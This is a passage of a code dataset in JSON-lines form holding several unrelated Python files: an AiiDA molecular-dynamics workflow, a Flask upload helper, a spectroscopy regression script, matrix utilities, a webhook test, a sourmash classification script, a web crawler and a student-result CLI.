the total trajectory so far.\n If they are higher of the threshold, abort.\n \"\"\"\n total_energy_max_fluctuation = self.inputs.get('total_energy_max_fluctuation', None)\n if total_energy_max_fluctuation:\n calculation = self.ctx.children[self.ctx.iteration - 1]\n try:\n traj = calculation.outputs.output_trajectory\n except exceptions.NotExistent:\n self.report('{}><{}> [check_energy_fluctuations]: Trajectory not found. Skipping test.'.format(\n calculation.process_label, calculation.pk))\n else:\n traj = get_total_trajectory(self, store=False)\n total_energies = traj.get_array('total_energies')\n diff = total_energies.max() - total_energies.min() \n if (diff > total_energy_max_fluctuation):\n self.report(\n '{}<{}> [check_energy_fluctuations]: Total energy fluctuations = {} EXCEEDED THRESHOLD {} !!'\n ' Stopping now...'.format(calculation.process_label, calculation.pk, diff, total_energy_max_fluctuation))\n return self.exit_codes.ERROR_TOTAL_ENERGY_FLUCTUATIONS\n else:\n self.report('{}<{}> [check_energy_fluctuations]: Total energy fluctuations = {} < threshold ({}) OK'.format(\n calculation.process_label, calculation.pk, diff, total_energy_max_fluctuation))\n\n def update_mdsteps(self):\n \"\"\"Get the number of steps of the last trajectory and update the counters. If there are more MD steps to do,\n set `restart_calc` and set the state to not finished.\n \"\"\"\n # The extra 'discard_trajectory' indicates if we wish to discard the trajectory, for whatever reason (not sure it ever happens).\n # If the calculation was successfull, there will be a trajectory\n # In this case we we shall restart from this calculation, otherwise restart_calc is not modified, such that we\n # will restart from the previous one.\n node = self.ctx.children[self.ctx.iteration - 1]\n try:\n traj = node.outputs.output_trajectory\n except (KeyError, exceptions.NotExistent):\n self.report('No output_trajectory was generated by {}<{}>.'.format(node.label, node.pk))\n # restart_calc is not updated, so we will restart from the last calculation (i.e. we retry the same thing)\n else:\n nsteps_run_last_calc = get_completed_number_of_steps(node)\n if not traj.get_extra('discard_trajectory', False):\n self.ctx.mdsteps_todo -= nsteps_run_last_calc\n self.ctx.mdsteps_done += nsteps_run_last_calc\n self.report('{}<{}> ran {} steps ({} done - {} to go).'.format(node.process_label, node.pk, nsteps_run_last_calc, self.ctx.mdsteps_done, self.ctx.mdsteps_todo))\n\n # if there are more MD steps to do, set the restart_calc to the last calculation\n if self.ctx.mdsteps_todo > 0:\n self.ctx.restart_calc = node\n self.ctx.is_finished = False\n else:\n self.report('{}<{}> ran {} steps. This trajectory will be DISCARDED!'.format(node.process_label, node.pk, nsteps_run_last_calc))\n\n# def report_error_handled(self, calculation, action):\n# \"\"\"Report an action taken for a calculation that has failed.\n#\n# This should be called in a registered error handler if its condition is met and an action was taken.\n#\n# :param calculation: the failed calculation node\n# :param action: a string message with the action taken\n# \"\"\"\n# arguments = [calculation.process_label, calculation.pk, calculation.exit_status, calculation.exit_message]\n# self.report('{}<{}> failed with exit status {}: {}'.format(*arguments))\n# self.report('Action taken: {}'.format(action))\n\n def results(self): # pylint: disable=inconsistent-return-statements\n \"\"\"Concatenate the trajectories and attach the outputs.\"\"\"\n # get the concatenated trajectory, even if the max number of iterations have been reached\n if self.inputs.get('previous_trajectory'):\n traj = get_total_trajectory(self, self.ctx.previous_trajectory, store=True)\n else:\n traj = get_total_trajectory(self, store=True)\n if traj:\n self.out('total_trajectory', traj)\n else:\n self.report('No trajectories were produced!')\n# return self.exit_codes.ERROR_NO_TRAJECTORY_PRODUCED\n try:\n node = self.ctx.children[self.ctx.iteration - 1]\n # We check the `is_finished` attribute of the work chain and not the successfulness of the last process\n # because the error handlers in the last iteration can have qualified a \"failed\" process as satisfactory\n # for the outcome of the work chain and so have marked it as `is_finished=True`.\n if not self.ctx.is_finished and self.ctx.iteration >= self.inputs.max_iterations.value:\n self.report(f'reached the maximum number of iterations {self.inputs.max_iterations.valu}: last ran {self.ctx.process_name}<{node.pk}>')\n return self.exit_codes.ERROR_MAXIMUM_ITERATIONS_EXCEEDED # pylint: disable=no-member\n except AttributeError:\n self.report(f'workchain did not run since a previous trajectory<{self.ctx.previous_trajectory}> already had the required number of nsteps')\n\n self.report(f'work chain completed after {self.ctx.iteration} iterations')\n\n def _wrap_bare_dict_inputs(self, port_namespace, inputs):\n \"\"\"Wrap bare dictionaries in `inputs` in a `Dict` node if dictated by the corresponding inputs portnamespace.\n\n :param port_namespace: a `PortNamespace`\n :param inputs: a dictionary of inputs intended for submission of the process\n :return: an attribute dictionary with all bare dictionaries wrapped in `Dict` if dictated by the port namespace\n \"\"\"\n from aiida.engine.processes import PortNamespace\n\n wrapped = {}\n\n for key, value in inputs.items():\n\n if key not in port_namespace:\n wrapped[key] = value\n continue\n\n port = port_namespace[key]\n\n if isinstance(port, PortNamespace):\n wrapped[key] = self._wrap_bare_dict_inputs(port, value)\n elif port.valid_type == orm.Dict and isinstance(value, dict):\n wrapped[key] = get_or_create_input_node(orm.Dict, value, store=True)\n else:\n wrapped[key] = value\n\n return AttributeDict(wrapped)\n\n\n ### PROCESS HANDLERS ###\n # error codes > 600 are related to MD trajectories\n # Often these errors happen when the calculation is killed in the middle of writing.\n # If an output trajectory is found, we shall always restart, no matter the error.\n # Even with error codes < 400 a trajectory may have been produced.\n # Otherwise, execute the other error handlers.\n # If no error handler is triggered (or none has returned a ProcessHandlerReport), the error is considered as\n # 'unhandled': in this case the calculation will be relaunched once. If it fails again, the work chain will fail.\n\n @process_handler(priority=700)\n def handle_salvage_output_trajectory(self, calculation):\n \"\"\"Check if an output trajectory was generated, no matter if the calculation failed, and restart.\"\"\"\n try:\n traj = calculation.outputs.output_trajectory\n except exceptions.NotExistent:\n # no output_trajectory, go through the other error handlers\n return\n else:\n # restart from trajectory\n self.ctx.restart_calc = calculation\n if calculation.exit_status != 0: self.report_error_handled(calculation, 'Restarting calculation...')\n return ProcessHandlerReport(True)\n\n# @process_handler(priority=600)\n# def handle_unrecoverable_failure(self, calculation):\n# \"\"\"Handle calculations with an exit status below 400 which are unrecoverable, so abort the work chain.\"\"\"\n# if calculation.is_failed and calculation.exit_status < 400:\n# self.report_error_handled(calculation, 'unrecoverable error, aborting...')\n# return ProcessHandlerReport(True, self.exit_codes.ERROR_UNRECOVERABLE_FAILURE)\n\n# @process_handler(priority=590, exit_codes=[\n# PwCalculation.exit_codes.ERROR_COMPUTING_CHOLESKY,\n# ])\n# def handle_known_unrecoverable_failure(self, calculation):\n# \"\"\"Handle calculations with an exit status that correspond to a known failure mode that are unrecoverable.\n#\n# These failures may always be unrecoverable or at some point a handler may be devised.\n# \"\"\"\n# self.report_error_handled(calculation, 'known unrecoverable failure detected, aborting...')\n# return ProcessHandlerReport(True, self.exit_codes.ERROR_KNOWN_UNRECOVERABLE_FAILURE)\n\n ### EXIT CODES >= 400 THAT HAVE NOT BEEN HANDLED YET\n# @process_handler(priority=410, exit_codes=[\n# FlipperCalculation.exit_codes.ERROR_ELECTRONIC_CONVERGENCE_NOT_REACHED,])\n# def handle_electronic_convergence_not_achieved(self, calculation):\n# \"\"\"Handle `ERROR_ELECTRONIC_CONVERGENCE_NOT_REACHED`: decrease the mixing beta and restart from scratch.\"\"\"\n\n ## add possible flipper-specific error handlers\n","repo_name":"epfl-theos/aiida-flipper","sub_path":"aiida_flipper/workflows/replaymd.py","file_name":"replaymd.py","file_ext":"py","file_size_in_byte":41291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"41687497880","text":"import os\nfrom flask import abort, current_app\nfrom werkzeug.utils import secure_filename\nfrom instance.config import ALLOWED_EXTENSIONS\n\n\ndef content_folder(object_type, id, content_type, upload=False):\n tail = os.path.join(content_type, object_type, str(id))\n\n if upload:\n base_dir = os.path.join(current_app.config['CONTENT_ROOT_UPLOAD'], tail)\n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n return base_dir\n else:\n if os.path.exists(os.path.join(current_app.config['CONTENT_ROOT_UPLOAD'], tail)):\n return os.path.join(current_app.config['CONTENT_ROOT_DOWNLOAD'], tail)\n else:\n return os.path.join(current_app.config['CONTENT_ROOT_DOWNLOAD'], content_type, object_type, '0')\n\n\ndef get_uploaded_file(request):\n\n # check if the post request has the file part\n if 'file' not in request.files:\n abort(400, 'No file part in the request')\n\n pic = request.files['file']\n\n if pic.filename == '':\n abort(400, 'No file selected for uploading')\n\n if not allowed_file(pic.filename):\n abort(400, 'Allowed file types are txt, pdf, png, jpg, jpeg, gif')\n\n filename = secure_filename(pic.filename)\n\n return pic, filename\n\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n","repo_name":"Dandelion-dev-team/dandelion","sub_path":"Flask/app/utils/uploads.py","file_name":"uploads.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"26645946105","text":"from __future__ import division\nimport os\nimport numpy as np\nimport pandas as pd\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nfrom sklearn import linear_model, preprocessing\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import validation_curve\ntry:\n import cPickle\nexcept ImportError:\n import _pickle as cPickle\n\nfrom utils import create_combined, prepare_linelist, prepare_spectrum, save_and_compare_apogee, save_and_compare_synthetic\n\n\ndef poly_clf():\n polynomial_features = PolynomialFeatures(degree=3, include_bias=False)\n linear_regression = linear_model.LinearRegression()\n clf = Pipeline([(\"polynomial_features\", polynomial_features), (\"linear_regression\", linear_regression)])\n #clf.fit(X[:, np.newaxis], y)\n #y_pred = clf.predict(X_test[:, np.newaxis])\n return clf\n\n\ndef validation():\n\n if not os.path.isfile('combined_spec.csv'):\n create_combined()\n\n df = pd.read_csv('combined_spec.csv', index_col=0)\n df.set_index('spectrum', inplace=True)\n xlabel = df.columns.values[:-7]\n ylabel = df.columns.values[-7:-3]\n X = df.loc[:, xlabel]\n y = df.loc[:, ylabel]\n\n param_range = [0.0001, 0.001, 0.01]\n #linear_model.RidgeCV(alphas=[0.01, 0.1, 1.0, 10.0, 100.0, 1000.0])\n #linear_model.Ridge(alpha=[0.001])\n\n train_scores, test_scores = validation_curve(linear_model.Ridge(), X, y, param_name=\"alpha\", param_range=param_range, scoring=\"accuracy\", n_jobs=-1)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n\n plt.title(\"Validation Curve\")\n plt.xlabel(\"alpha\")\n plt.ylabel(\"Score\")\n plt.ylim(0.0, 1.1)\n lw = 2\n plt.semilogx(param_range, train_scores_mean, label=\"Training score\",\n color=\"darkorange\", lw=lw)\n plt.fill_between(param_range, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.2,\n color=\"darkorange\", lw=lw)\n plt.semilogx(param_range, test_scores_mean, label=\"Cross-validation score\",\n color=\"navy\", lw=lw)\n plt.fill_between(param_range, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.2,\n color=\"navy\", lw=lw)\n plt.legend(loc=\"best\")\n plt.show()\n\n\ndef train(clf, model, save=True, cutoff=0.9999, percent=50, plot=True, scale=False):\n # Model just for saving options\n if not os.path.isfile('combined_spec.csv'):\n create_combined()\n\n df = pd.read_csv('combined_spec.csv', index_col=0)\n df.set_index('spectrum', inplace=True)\n xlabel = df.columns.values[:-7]\n ylabel = df.columns.values[-7:-3]\n X = df.loc[:, xlabel]\n y = df.loc[:, ylabel]\n\n # select continuum\n continuum = []\n for xlab in xlabel[:]:\n flux = X[xlab]\n flux_cont = flux.loc[flux > cutoff]\n if (len(flux_cont)/len(flux))*100 > percent:\n continuum.append(xlab)\n\n columns = np.array(continuum)\n X.drop(columns, inplace=True, axis=1)\n print('The number of flux points is %s from the original %s.' % (len(xlabel)-len(continuum), len(xlabel)))\n if scale:\n #Is this ok?\n X = preprocessing.robust_scale(X)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n clffit = clf.fit(X_train, y_train)\n print(clffit)\n N = len(y_test)\n t = time()\n y_pred = clf.predict(X_test)\n t = time()-t\n speedup = 60*N/t\n print('Calculated parameters for {} stars in {:.2f}ms'.format(N, t*1e3))\n print('Speedup: {} million times'.format(int(speedup/1e6)))\n print('Test set score: {:.2f}'.format(clf.score(X_test, y_test)))\n print('Training set score: {:.2f}'.format(clffit.score(X_train, y_train)))\n\n for i, label in enumerate(ylabel):\n score = mean_absolute_error(y_test[label], y_pred[:, i])\n print('Mean absolute error for {}: {:.2f}'.format(label, score))\n if plot:\n plt.figure()\n plt.scatter(y_test[label], y_test[label].values - y_pred[:, i], s=70, alpha=0.4)\n plt.grid()\n plt.title(label)\n plt.savefig(label + '_' + model + '.png')\n plt.show()\n\n if save:\n with open('FASMA_ML.pkl', 'wb') as f:\n cPickle.dump(clf, f)\n return clf, continuum\n\n\ndef train_models(mod):\n\n print('Selected model: %s' % mod)\n if mod == 'linear':\n clf = linear_model.LinearRegression(n_jobs=-1)\n elif mod == 'lasso':\n clf = linear_model.Lasso(alpha=0.001, max_iter=10000, tol=0.001, normalize=True, positive=True)\n elif mod == 'lassolars':\n clf = linear_model.LassoLars(alpha=0.001)\n elif mod == 'multilasso':\n clf = linear_model.MultiTaskLasso(alpha=0.1)\n elif mod == 'ridgeCV':\n clf = linear_model.RidgeCV(alphas=[0.01, 0.1, 1.0, 10.0, 100.0, 1000.0])\n elif mod == 'ridge':\n clf = linear_model.Ridge(alpha=[0.001])\n elif mod == 'bayes':\n clf = linear_model.BayesianRidge()\n elif mod == 'huber':\n clf = linear_model.HuberRegressor()\n elif mod == 'poly':\n clf = poly_clf()\n\n clf, continuum = train(clf, mod, save=True, plot=True)\n return clf, continuum\n\n\ndef test_set(clf, model, continuum=None, scale=False):\n\n #here model is just for saving the plot files\n spec = np.genfromtxt('obs_synth.lst', dtype='str')\n params = []\n for s in spec:\n x = prepare_spectrum(s, continuum)\n if scale:\n x = preprocessing.robust_scale(x)\n\n p = clf.predict(x)[0]\n params.append(p)\n #plt.plot(clf.coef_[0], x[0], 'o')\n #plt.show()\n\n #teff = np.dot(clf.coef_[0], x[0]) + clf.intercept_[0]\n #print('teff', teff)\n #print('Star: %s' % s)\n #print('\\nStellar atmospheric parameters:')\n #print('Teff: {:.0f} K'.format(p[0]))\n #print('logg: {:.2f} dex'.format(p[1]))\n #print('[M/H]: {:.2f} dex'.format(p[2]))\n #print('alpha: {:.2f} dex'.format(p[3]))\n #print('vt: {:.2f} km/s'.format(p[4]))\n #print('vmac: {:.2f} km/s'.format(p[5]))\n #print('vsini: {:.2f} km/s'.format(p[6]))\n params = np.array(params)\n d = [spec, params[:, 0], params[:, 1], params[:, 2], params[:, 3]]\n d = np.array(d)\n spec = list(map(lambda x: x.split('/')[-1], spec))\n d = {'specname': spec, 'teff': params[:, 0], 'logg': params[:, 1], 'metal': params[:, 2], 'alpha': params[:, 3]}\n\n results = save_and_compare_synthetic(d, model)\n #save_and_compare_apogee(d)\n return results\n\n\ndef lasso(alpha):\n clf = linear_model.Lasso(alpha=alpha, max_iter=10000, normalize=True)\n mod = 'lasso_' + str(alpha)\n train(clf, mod)\n return\n\n\ndef ridge(alpha, cutoff=0.9999, percent=50):\n clf = linear_model.Ridge(alpha=[alpha])\n model = 'ridge_' + str(alpha) + '_' + str(percent)\n clf, continuum = train(clf, model, save=True, cutoff=0.9999, percent=percent, plot=True, scale=False)\n results = test_set(clf, model, continuum)\n return results\n\nif __name__ == '__main__':\n\n models = ['ridge']\n #models = ['linear', 'lasso', 'multilasso', 'lassolars', 'ridge', 'ridgeCV', 'bayes', 'huber', 'poly']\n #validation()\n #for mod in models:\n # clf, continuum = train_models(mod)\n # #with open('FASMA_ML.pkl', 'rb') as f:\n # # clf = cPickle.load(f)\n # #print(clf)\n # test_set(clf, mod, continuum=continuum)\n\n alpha = [0.01, 0.1]\n for a in alpha:\n results = ridge(a, cutoff=0.9999, percent=50)\n","repo_name":"MariaTsantaki/spectroscopy-ML","sub_path":"specML/test_model_ML.py","file_name":"test_model_ML.py","file_ext":"py","file_size_in_byte":7794,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"42788716713","text":"import numpy as np\n\ndef triangular2flattened(x):\n \"\"\"Receives a square matrix and returns a flat array with upper-diagonal elements\n\n Args:\n x (ndarray): ndarray of shape (n,n), ideally upper-diagonal or symmetric\n\n Returns:\n ndarray: flattened ndarray of length n*(n+1)/2 with elements x11,x12,...,x1n,x22,...,xnn of x\n \"\"\"\n assert len(x.shape) == 2\n assert x.shape[0] == x.shape[1]\n return x[np.triu_indices(x.shape[0])]\n\ndef flattened2triangular(flat, n=None):\n \"\"\"Receives a flattened list of size n*(n+1)/2 and returns upper-triangular square matrix\n\n Args:\n flat (ndarray): ndarray with values [a11,a12,...,a1n,a22,...,ann]\n n [optional] (int): dimention of the triangular matrix, such that n*(n+1)/2 = len(flat)\n\n Returns:\n ndarray: triangular matrix of shape (n,n) with upper-diagonal valuer filled with elements of flat\n \"\"\"\n if n is None:\n N = len(flat)\n # solves basic equation n*(n-1)/2 = N\n n = (-1. + np.sqrt(1.+8.*N))/2\n else:\n assert len(flat) == n*(n+1)/2\n assert float(n).is_integer()\n n = int(n)\n sqr = np.zeros((n,n))\n sqr[np.triu_indices(n)] = flat\n return sqr\n\n## Test\n# a = np.array([1,2,3,4,5,6])\n# sqr = flattened2triangular(a)\n# print(sqr)\n# print(triangular2flattened(sqr))","repo_name":"danielquintao/longitudinalmodels","sub_path":"utils/matrix_utils.py","file_name":"matrix_utils.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"15929042596","text":"\"\"\"This is a test file, and it has not been used in the production code.\nThis file is used to manually send Alchemy Webhook data to the webhook URL.\n\nBefore running this file, please MAKE SURE you are running test_app.py in TESTS directory.\nAlso, make sure you've added the target address in tracking_wallets.json.\n\"\"\"\nimport requests\n\nimport utilities as utils\n\nwebhook_url = utils.read_config()[\"webhook_url\"] + \"/alchemy\"\n\n\n# Alchemy Webhook data\n# You can find Alchemy Webhook data from the logs directory\n# Lists of Alchemy Webhook data dicts\ndatas = [{dict},\n {dict}, ...]\n\n\nfor data in datas:\n # Send a POST request to the webhook URL\n response = requests.post(webhook_url, json=data)\n\n # Check the response status\n if response.status_code == 200:\n print(\"Request sent successfully.\")\n else:\n print(f\"Request failed with status code {response.status_code}: {response.text}\")\n","repo_name":"HappyGroupHub/Ethereum-Wallet-Tracker","sub_path":"tests/manual_alchemy.py","file_name":"manual_alchemy.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"}
+{"seq_id":"33049795079","text":"#! /usr/bin/env python\n\"\"\"\nDig into the bulk classification results from bulk-classify-sbt-with-lca.py.\n\nBriefly, this script sorts results classed above order level into two bins\n* those that contain multiple hashes belonging unambiguously to two different\n species, i.e. chimerae.\n* other, e.g. things classed as a single lineage.\n\"\"\"\nimport sourmash\nimport sys\nfrom collections import defaultdict\nimport pprint\nimport csv\nimport os\n\nfrom sourmash.logging import error, debug, set_quiet, notify\nfrom sourmash.lca import lca_utils\nfrom sourmash.lca.command_classify import classify_signature\nimport argparse\n\nFILTER_AT='order'\n\n\ndef summarize_agg_to_level(hashvals, dblist, threshold, level):\n \"\"\"\n Classify 'hashvals' using the given list of databases.\n\n Insist on at least 'threshold' counts of a given lineage before taking\n it seriously.\n\n Return (lineage, counts) where 'lineage' is a tuple of LineagePairs.\n \"\"\"\n\n stop_at = []\n for i in lca_utils.taxlist(include_strain=False):\n stop_at.append(i)\n if i == level:\n break\n\n # gather assignments from across all the databases\n assignments = lca_utils.gather_assignments(hashvals, dblist)\n\n # now convert to trees -> do LCA & counts\n counts = lca_utils.count_lca_for_assignments(assignments)\n debug(counts.most_common())\n\n # ok, we now have the LCAs for each hashval, and their number\n # of counts. Now aggregate counts across the tree, up 'til desired\n # level; stop there.\n aggregated_counts = defaultdict(int)\n for lca, count in counts.most_common():\n if count < threshold:\n break\n\n if not lca:\n aggregated_counts[lca] += count\n continue\n\n if lca[-1].rank in stop_at:\n aggregated_counts[lca] += count\n continue\n\n # climb from the lca to the root.\n while lca:\n lca = lca[:-1]\n if lca and lca[-1].rank in stop_at:\n aggregated_counts[lca] += count\n break\n\n return aggregated_counts\n\n\ndef main(args):\n \"\"\"\n \"\"\"\n p = argparse.ArgumentParser()\n p.add_argument('prefix')\n p.add_argument('lca_db', nargs='+')\n p.add_argument('classify_csv')\n p.add_argument('--scaled', type=float)\n p.add_argument('--threshold', type=int, default=5)\n p.add_argument('-q', '--quiet', action='store_true',\n help='suppress non-error output')\n p.add_argument('-d', '--debug', action='store_true',\n help='output debugging output')\n p.add_argument('--confused-hashvals', type=str)\n args = p.parse_args(args)\n\n dirname = '{}-unclassified-sigs'.format(args.prefix)\n dirname2 = '{}-unclassified-sigs-chimera.info'.format(args.prefix)\n try:\n os.mkdir(dirname2)\n except:\n pass\n set_quiet(args.quiet, args.debug)\n\n if args.scaled:\n args.scaled = int(args.scaled)\n\n # load all the databases\n dblist, ksize, scaled = lca_utils.load_databases(args.lca_db, args.scaled)\n\n print(ksize, scaled)\n\n assert len(dblist) == 1\n lca_db = dblist[0]\n\n confused_hashvals = set()\n if args.confused_hashvals:\n for i in open(args.confused_hashvals, 'rt'):\n confused_hashvals.add(int(i.strip()))\n\n ###\n\n fp = open(args.classify_csv, 'rt')\n r = csv.DictReader(fp, fieldnames=['rank', 'name', 'filename', 'md5sum'])\n\n fp2 = open('{}-dig.csv'.format(args.prefix), 'wt')\n w = csv.writer(fp2)\n\n n = 0\n m = 0\n for row in r:\n if row['rank'] in ('MISSED', 'species', 'genus', 'family', 'order'):\n continue\n name = row['name']\n md5sum = row['md5sum']\n sig = sourmash.load_one_signature(os.path.join(dirname, md5sum) + '.sig')\n\n hashvals = defaultdict(int)\n for hashval in sig.minhash.get_mins():\n if hashval not in confused_hashvals:\n hashvals[hashval] += 1\n\n lineage_counts = summarize_agg_to_level(hashvals, dblist, args.threshold, FILTER_AT)\n\n if len(lineage_counts) >= 2:\n print(name)\n for lineage, count in lineage_counts.items():\n if lineage:\n print(' ', count, \";\".join(lca_utils.zip_lineage(lineage)))\n else:\n print(' ', count, 'root')\n print('----\\n')\n\n fp3 = open(os.path.join(dirname2, row['md5sum']) + '.txt', 'wt')\n for lineage, count in lineage_counts.items():\n fp3.write(\"{} {}\\n\".format(count, \";\".join(lca_utils.zip_lineage(lineage))))\n fp3.close()\n \n n += 1\n\n w.writerow(['chimera', row['name'], row['filename'], row['md5sum']])\n else:\n w.writerow(['other', row['name'], row['filename'], row['md5sum']])\n m += 1\n\n print(n, m)\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"dib-lab/2019-sourmash-gtdb","sub_path":"bulk-classify-dig.py","file_name":"bulk-classify-dig.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"8119552781","text":"# import libraries\nimport urllib\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nimport ssl\nimport urllib.request as request\nimport html2text\nimport io\n\nfrom preprocess import clean_data\n\ndef url_check(url):\n\t\"\"\"\n\tChecks the url if it is accessible.\n\tIt takes into account some possible exceptions.\n\t\"\"\"\n\n\ttry:\n\t\tresponse = urlopen(url)\n\t\treturn True\n\texcept urllib.error.HTTPError:\n\t\treturn False\n\texcept urllib.error.URLError:\n\t\treturn False\n\t#except httplib.HTTPException:\n\texcept Exception:\n\t\timport traceback\n\t\treturn False\n\n\ndef get_urls(url):\n\t\"\"\"\n\tReturns all the urls in the same domain as a list.\n\t\n\t\"\"\"\n\t## Get raw html content from url\n\tcontent = simple_get(url)\n\n\tif content is None:\n \t## Try a different protocol\n\t\ttry:\n\t\t\tcontext = ssl._create_unverified_context()\n\t\t\twebsite = urlopen(url, context=context)\n\t\t\twebsite = urlopen(url)\n\t\t\tcontent = website.read()\n\t\texcept:\n\t\t\turl_list = []\n\t\t\treturn url_list\n \n\tsoup = BeautifulSoup(content,\"html5lib\")\n\t\n\tlinks = soup.findAll(\"a\")\n\turl_list = []\n\tfor link in links:\n\t\tsub_url = link.get('href')\n\t\tif sub_url is not None:\n \t## Check if the url is in the same domain\n\t\t\tif 'http' in sub_url and url_cleaning(url) in sub_url: \n\t\t\t\turl_list.append(sub_url)\n\n\tprint(\"get_urls done\")\n\treturn url_list\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at \"url\" by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n \treturn resp.content\n else:\n \treturn None\n\n except RequestException as e:\n print('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n if \"Content-Type\" in resp.headers.keys():\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200 \n and content_type is not None \n and content_type.find('html') > -1)\n\n\ndef get_content(url):\n\t\"\"\"\n\tConverts html content to text, and return the content if it's not None.\n\t\"\"\"\n\traw_html = simple_get(url)\n\tif raw_html is not None:\n\t\ttry:\n\t\t\traw_html = str(raw_html.decode(\"utf-8\"))\n\t\t\ttext_maker = html2text.HTML2Text()\n\t\t\ttext_maker.ignore_links = True\n\t\t\ttext_maker.bypass_tables = False\n\t\t\ttext_maker.escape_snob = True\n\t\t\ttext_maker.ignore_images = True\n\t\t\ttext_maker.ignore_anchors = True\n\n\t\t\tcontent = text_maker.handle(raw_html)\n\n\t\t\treturn content\n\t\texcept:\n\t\t\treturn None\n\telse:\n\t\treturn None\n\n\ndef url_cleaning(website):\n\t\"\"\"\n\tRemoves protocol part from the url, returns the name of the website.\n\tThis is implemented to create \"website2mcc\" dictionary. In web crawler,\n\twe only use it to get mcc code for given website from the dictionary.\n\tBecause some websites are written with multiple protocols.\n\t\"\"\"\n\twebsite = website.lower()\n\twebsite = website.replace(\"https://\", \"\")\n\twebsite = website.replace(\"http://\", \"\")\n\twebsite = website.replace(\"https://www.\", \"\")\n\twebsite = website.replace(\"http://www.\", \"\")\n\twebsite = website.replace(\"//www.\", \"\")\n\twebsite = website.replace(\"www.\", \"\")\n\twebsite = website.replace(\" \", \"\")\n\twebsite = website.replace(\"\\xa0\", \"\")\n\n\tif website.endswith(\"/\"):\n\t\twebsite = website[:-1]\n \n\tif website.endswith(\")\") and website.startswith(\"(\"):\n\t\twebsite = website[1:-1]\n \n\treturn website\n\n \t\n\ndef read_website2mcc():\n\t\"\"\"\n\tReads the MCCs from saved dictionary.\n\tWhen we get the web content, we save it with its\n\tmcc code in the file.\n\t\"\"\"\n\twebsite2mcc = {}\n\n\twith open(\"website2mcc\") as f:\n\t\tlines = f.read().splitlines()\n\t\tfor line in lines:\n\t\t\ttoken = line.split(\":\")\n\t\t\twebsite2mcc[token[0]] = token[1]\n\n\treturn website2mcc\n\n\n\n\ndef pipeline(website, filename):\n\n\tfile = open(filename, \"w\", encoding = \"utf-8\")\n\tprint(\"Crawling website: \", website)\n\n\tweb_name = url_cleaning(website)\n\twebsite2mcc = read_website2mcc()\n\t\n\n\tprint(\"url_check: \", url_check(website))\n\tif url_check(website):\n\t\tcontent = get_content(website)\n\n\t\tif content is not None:\n\t\t\tprint(\"web content is not None\")\n\t\t\tcontent_processed = clean_data(content)\n\t\t\tfile.write('%s, %s\\n' % (website, content_processed))\n\n\n\t\t#get url list in the same domain\n\t\turls = get_urls(website)\n\t\tprint(\"number of urls: \", len(urls))\n\t\tfor url in urls:\n\t\t\tif url_check(url):\n\t\t\t\tcontent = get_content(url)\n\t\t\t\tif content is not None:\n\t\t\t\t\tcontent_processed = clean_data(content)\n\t\t\t\t\tfile.write('%s, %s\\n' % (url, content_processed))\n\t\t\t\t\tprint(\"preprocessed \", url)\n\ndef main():\n\t# write the website content to the file\n\tpipeline(\"https://www.musictabletstore.com/\", \"filename\")\n \n\nif __name__ == '__main__':\n\tmain()","repo_name":"basakeskili/Master-Thesis-AI","sub_path":"web_crawler.py","file_name":"web_crawler.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"2492500665","text":"#!/usr/bin/env python\n\nimport csv\nimport argparse\nimport datetime\nimport pathlib\n\nfrom text_constants import (\n STORE_RESULT_USAGE_EXAMPLE, \n STORE_RESULT_NAME_HELP, \n STORE_RESULT_DOB_HELP, \n STORE_RESULT_SUBJECT_HELP, \n STORE_RESULT_TOTAL_HELP, \n STORE_RESULT_SCORE_HELP, \n STORE_RESULT_STORE_HELP\n)\n\nFIELD_NAMES = ['name', 'dob', 'subject', 'total', 'score', 'percentage']\nSUBJECT_CHOICES = ['Nepali', 'English', 'Math', 'Science', 'Social']\n\ndef validate_date(date_string):\n try:\n return f\"{datetime.datetime.strptime(date_string, '%d-%m-%Y')}\".split(' ')[0]\n except (ValueError):\n raise SystemExit('Invalid date format. Should be DD-MM-YYYY.')\n\ndef validate_score(result):\n if result['score'] > result['total'] or result['score'] < 0 or result['score'] == -0.0:\n raise SystemExit(\n 'Score not in valid range. \\npython3 store_result.py --help, for detail.')\n \ndef validate_file_type(file_name):\n if file_name.find('.csv') == -1:\n raise SystemExit('File extension 